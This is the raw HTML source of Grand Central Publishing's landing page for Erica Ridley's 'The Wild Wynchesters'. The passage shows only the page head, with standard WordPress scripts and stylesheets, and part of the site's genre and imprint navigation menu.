<!DOCTYPE html>
<html lang="en-US">
	<head>
		<meta charset="UTF-8"><script type="text/javascript">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</script>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="google-site-verification" content="85wAGAWAuJVKY63Av9XQL_d8G9S3oJQ9FIKRL_p_NnA" />
<meta name="msvalidate.01" content="0051B8D8511A2B9F4DE35FC989DC79B8" />
<meta name="p:domain_verify" content="d17b1f4fbc23ea8e105438f14592909f"/>
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>The Wild Wynchesters | Grand Central Publishing</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//static.srcspot.com' />
<link rel='dns-prefetch' href='//launcher.zo.la' />
<link rel='dns-prefetch' href='//platform.twitter.com' />
<link rel='dns-prefetch' href='//unpkg.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Feed" href="https://www.grandcentralpublishing.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Comments Feed" href="https://www.grandcentralpublishing.com/comments/feed/" />
<meta name='description' content='Meet Erica Ridley&#039;s Wild Wynchesters!' /><!-- WP SEO -->
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.grandcentralpublishing.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.grandcentralpublishing.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css'  href='https://www.grandcentralpublishing.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://www.grandcentralpublishing.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.0' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='qm-objectcache-style-css'  href='https://www.grandcentralpublishing.com/wp-content/mu-plugins/qm-plugins/qm-object-cache/css/style.css?ver=0.1' type='text/css' media='all' />
<link rel='stylesheet' id='hachette-site-css-css'  href='https://www.grandcentralpublishing.com/wp-content/themes/hachette/static/css/hachette-site.min.css?ver=82a0e38301f5aa8cd2b6' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-all-domains-css-css'  href='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/css/lens-hbg-all-domains.css?ver=bb4252242b73f07ad540' type='text/css' media='all' />
<link rel='stylesheet' id='hachette-lens-css-css'  href='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/css/lens-grand-central-publishing.css?ver=bb4252242b73f07ad540' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-google-fonts-source-sans-css'  href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600%2C700&#038;ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-leaflet-css-css'  href='https://unpkg.com/leaflet@1.7.1/dist/leaflet.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://www.grandcentralpublishing.com/wp-content/mu-plugins/jetpack-10.9/css/jetpack.css?ver=10.9' type='text/css' media='all' />
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://static.srcspot.com/libs/brittney.js?ver=0.1.0' id='mimecast-script-js'></script>
<script type='text/javascript' src='https://launcher.zo.la/assets/zbwidget-launcher-0.1.0.js?ver=0.1.0' id='zola-widget-launcher-js'></script>
<script type='text/javascript' src='https://unpkg.com/leaflet@1.7.1/dist/leaflet.js?ver=1.0' id='hachette-leaflet-js-js'></script>
<link rel="https://api.w.org/" href="https://www.grandcentralpublishing.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.grandcentralpublishing.com/wp-json/wp/v2/landing-page/1223196" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.grandcentralpublishing.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.grandcentralpublishing.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 6.0" />
<link rel="canonical" href="https://www.read-forever.com/landing-page/wild-wynchesters/" />
<link rel='shortlink' href='https://www.grandcentralpublishing.com/?p=1223196' />
<link rel="alternate" type="application/json+oembed" href="https://www.grandcentralpublishing.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.grandcentralpublishing.com%2Flanding-page%2Fwild-wynchesters%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.grandcentralpublishing.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.grandcentralpublishing.com%2Flanding-page%2Fwild-wynchesters%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style>
				<script>
				window.dataLayer = window.dataLayer || [];
				window.dataLayer.push(
					{"imprint":"hachette","genre":"","genreSecondary":"","genreTertiary":"","format":""}				);
			</script>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="The Wild Wynchesters" />
<meta property="og:url" content="https://www.grandcentralpublishing.com/landing-page/wild-wynchesters/" />
<meta property="og:description" content="Visit the post for more." />
<meta property="article:published_time" content="2022-05-23T14:54:41+00:00" />
<meta property="article:modified_time" content="2022-06-01T14:02:15+00:00" />
<meta property="og:site_name" content="Grand Central Publishing" />
<meta property="og:image" content="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=512%2C512" />
<meta property="og:image:width" content="512" />
<meta property="og:image:height" content="512" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="The Wild Wynchesters" />
<meta name="twitter:image" content="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=240%2C240" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Visit the post for more." />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=270%2C270" />
		<style type="text/css" id="wp-custom-css">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</style>
			</head>
	<body class="landing-page-template-default single single-landing-page postid-1223196 grandcentralpublishing">
				<div id="page" class="site single-post page imprint">
			<header class="site-header">
	<nav class="site-header__nav swappable" data-swap-location=".imprint-header__menu" data-swap-method="append" data-swap-max="m">
		<a href="https://www.hachettebookgroup.com/">
			<div class="site-header__desktop-logo imprint__global-logo ">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-364045070  desc-hachette-logo-2948773774">
	<title id="title-hachette-logo-364045070">Hachette Logo</title>
	<desc id="desc-hachette-logo-2948773774">Hachette Logo</desc>
	<polygon role="presentation" class="logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
	<polygon role="presentation" class="logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
			</div>
		</a>
		<div class="menu-imprint-nav-container"><ul id="menu-hachette-primary-menu" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genres/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Genres">Genres</a><span id="expand-site-header__sub-menu-201115207" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-201115207" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-201115207" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1175489006  desc-arrow-344679018">
	<title id="titlet-arrow-1175489006">Arrow Icon</title>
	<desc id="desc-arrow-344679018">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-201115207" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-201115207"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/childrens-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Children&#039;s Books">Children&#039;s Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/cooking/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Cooking">Cooking</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/fiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Fiction">Fiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/mind-body-spirit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mind, Body, Spirit">Mind, Body, Spirit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/mystery-thriller/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mystery &amp; Thriller">Mystery &amp; Thriller</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/nonfiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Nonfiction">Nonfiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Romance">Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/sci-fi-fantasy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sci-Fi &amp; Fantasy">Sci-Fi &amp; Fantasy</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/teen-young-adult/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Teen &amp; Young Adult">Teen &amp; Young Adult</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Travel">Travel</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Authors">Authors</a><span id="expand-site-header__sub-menu-1444400422" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1444400422" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1444400422" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3095247861  desc-arrow-3931669398">
	<title id="titlet-arrow-3095247861">Arrow Icon</title>
	<desc id="desc-arrow-3931669398">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1444400422" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1444400422"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Our Authors">Our Authors</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-events/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Events">Author Events</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/imprints/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-2102039029" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-2102039029" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-2102039029" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3158803161  desc-arrow-3103588159">
	<title id="titlet-arrow-3158803161">Arrow Icon</title>
	<desc id="desc-arrow-3103588159">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-2102039029" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-2102039029"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Grand Central Publishing">Grand Central Publishing</a><span id="expand-site-header__sub-menu-995884305" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-995884305" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-995884305" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2053617020  desc-arrow-2618257133">
	<title id="titlet-arrow-2053617020">Arrow Icon</title>
	<desc id="desc-arrow-2618257133">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-995884305" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-995884305"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/legacy-lit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve Books">Twelve Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit Publishing">Orbit Publishing</a><span id="expand-site-header__sub-menu-626170591" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-626170591" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-626170591" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4059170838  desc-arrow-3084931967">
	<title id="titlet-arrow-4059170838">Arrow Icon</title>
	<desc id="desc-arrow-3084931967">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-626170591" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-626170591"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/orbit/page/orbit-catalog/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit">Orbit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/redhook/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Redhook">Redhook</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Audio">Hachette Audio</a><span id="expand-site-header__sub-menu-1436660788" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1436660788" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1436660788" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2356624702  desc-arrow-3014218100">
	<title id="titlet-arrow-2356624702">Arrow Icon</title>
	<desc id="desc-arrow-3014218100">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1436660788" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1436660788"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/wattpad/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wattpad">Wattpad</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Nashville">Hachette Nashville</a><span id="expand-site-header__sub-menu-251124597" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-251124597" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-251124597" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3399876418  desc-arrow-371373902">
	<title id="titlet-arrow-3399876418">Arrow Icon</title>
	<desc id="desc-arrow-371373902">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-251124597" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-251124597"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/center-street/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Center Street">Center Street</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/faithwords/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="FaithWords">FaithWords</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/worthy-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Worthy Books">Worthy Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown and Company">Little, Brown and Company</a><span id="expand-site-header__sub-menu-1972216522" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1972216522" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1972216522" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1188891748  desc-arrow-357017993">
	<title id="titlet-arrow-1188891748">Arrow Icon</title>
	<desc id="desc-arrow-357017993">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1972216522" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1972216522"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/back-bay-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Back Bay Books">Back Bay Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/little-brown-spark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little Brown Spark">Little Brown Spark</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/mulholland-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mulholland Books">Mulholland Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/voracious/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Voracious">Voracious</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Books for Young Readers">Little, Brown Books for Young Readers</a><span id="expand-site-header__sub-menu-1950939348" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1950939348" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1950939348" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2742837597  desc-arrow-2457985930">
	<title id="titlet-arrow-2742837597">Arrow Icon</title>
	<desc id="desc-arrow-2457985930">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1950939348" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1950939348"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/christy-ottaviano-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Christy Ottaviano Books">Christy Ottaviano Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/jimmy-patterson/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="JIMMY Patterson">JIMMY Patterson</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/lb-kids/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="LB Kids">LB Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/poppy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Poppy">Poppy</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Perseus">Perseus</a><span id="expand-site-header__sub-menu-636942344" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-636942344" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-636942344" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2988887935  desc-arrow-306254612">
	<title id="titlet-arrow-2988887935">Arrow Icon</title>
	<desc id="desc-arrow-306254612">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-636942344" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-636942344"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Avalon Travel">Avalon Travel</a><span id="expand-site-header__sub-menu-211017751" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-211017751" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-211017751" >
